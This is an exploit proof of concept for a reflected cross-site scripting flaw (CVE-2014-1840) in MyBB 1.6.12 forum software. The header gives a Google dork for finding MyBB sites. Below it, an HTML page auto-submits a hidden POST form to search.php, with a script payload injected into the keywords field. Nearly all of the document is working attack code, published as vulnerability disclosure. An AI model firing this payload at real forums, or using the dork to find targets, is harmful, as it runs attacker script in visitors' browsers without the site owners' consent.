<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: February 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Video: https://www.youtube.com/watch?v=67MfgixmWgo
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
CVE: CVE-2014-1840
-->
<body>
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
<input type="hidden" name="action" value="do_search" />
<input type="hidden" name="keywords"
value="qor'("\2a<script>alert(/XSS/)</script>
" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>